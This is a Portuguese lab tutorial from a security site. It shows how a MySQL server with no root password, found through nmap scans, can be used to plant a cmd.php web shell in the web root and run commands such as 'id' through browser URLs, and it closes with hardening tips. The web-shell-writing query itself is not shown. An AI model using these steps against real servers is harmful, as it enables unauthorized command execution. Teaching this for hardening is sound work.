Através do MySQL é possível executar comandos dentro de um servidor e o objetivo deste artigo é reforçar a importância de revisar as configurações de Hardening como as Permissões de usuários e diretórios, Senhas e Seviços ativos.

Cenário

Kali Linux : 192.168.0.222

WebServer : 192.168.0.130

01 - Passo

Após executar o Nmap no Webserver : 192.168.0.130 é possível confirmar que a porta 3306 (mysql) está aberta.

Linux
nmap 192.168.0.130

02 - Passo

Através do Nmap é possível executar vários scripts e o script mysql-empty-password tem como objetivo verificar se o usuário root possui uma senha definida.

Neste caso é possível confirmar que a senha do root não foi definida.

Linux
nmap --script mysql-empty-password -p 3306 192.168.0.130

03 - Passo

Para confirmar realize a conexão ao banco de dados do servidor Webserver através do comando a seguir :

Linux
mysql -u root -h 192.168.0.130

04 - Passo

No servidor WebServer acesso o diretório do onde as páginas são publicadas no meu caso em : /var/www/html/ e lista o conteúdo :

Linux
cd /var/www/html/

ls -l

05 - Passo

No Kali Linux onde a conexão foi estabelecida com o Banco de Dados execute o comando a seguir :

Após a executção deste select uma página nomeada como cmd.php será criada dentro do servidor WebServer permitindo que o atacante execute comandos através do navegador.

Copiar Comando

06 - Passo

Ao listar novamente o conteúdo do diretório do WebServer é possível visualizar um novo arquivo : cmd.php criado pelo usuário mysql.

Linux
ls -l

07 - Passo

Abra o navegador e acesse a url : http://ip-do-webserver/cmd.php?cmd=comandos, exemplos :

Comando : id - Exibe o id do usuário.

http://ip-do-webserver/cmd.php?cmd=id

Comando : ls -l / - Exite o conteúdo do diretório / (raiz).

http://ip-do-webserver/cmd.php?cmd=ls -l /

Dicas

  • Mantenha seus servidores devidamente atualizados.
  • Aplique o Hardening (boas práticas de segurança) no servidor.
  • Fique atento aos Logs.
  • Realize PenTest de forma períodica.


  Autor

Marcos Henrique

 São Paulo/SP



  Ferramentas de Exploração

© 2020 - 100SECURITY

Contato